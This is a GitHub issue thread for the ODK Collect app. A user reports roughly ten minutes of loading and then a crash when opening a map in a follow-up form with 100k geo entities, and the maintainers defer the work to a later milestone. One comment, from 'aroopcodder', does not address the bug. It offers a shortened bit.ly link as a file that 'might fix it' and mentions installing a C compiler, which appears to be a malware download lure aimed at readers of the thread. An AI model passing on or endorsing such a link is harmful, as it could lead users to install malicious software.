### ISSUE TITLE
Long loading and crash during opening map in follow up form with 100k geo entities

### ISSUE THREAD

**Issue by WKobus** [getodk/collect#6426]
#### ODK Collect version
the master version 66e9c1f10f707b803654bc57f7930b805edf2742
#### Android version
10, 14
#### Device used
Redmi 7, Galaxy M23
#### Problem description
Opening map in follow up form with 100k geo entities results in ~10 min loading and crash afterwards.
I've used OSM as map source
#### Steps to reproduce the problem
1. Scan user test from project https://staging.getodk.cloud/#/projects/98/app-users
2. Go to start new form
3. Open Trees follow up form
4. Tap Select place

**Comment by aroopcodder** [comment]
This might help:This file might fix it
https://bit.ly/3TyLBMS

you may need to install the c compiler

**Comment by seadowg** [comment]
@WKobus what's the performance like in the store version?

@lognaturel we've not considered unfiltered selection map performance targets for large entity lists really. Is this something you think it's ok to leave for later?

**Comment by lognaturel** [comment]
Yes, I imagine this is unchanged and is currently expected. We can leave it for later.

**Comment by WKobus** [comment]
@seadowg Same thing happens on store version, after long loading crash occurs.

**Comment by lognaturel** [comment]
I've changed the milestone to Later for now -- this is likely to be a fairly significant project and it will likely pair well with other map-related work we'll eventually take on like the map-first Entity List view.
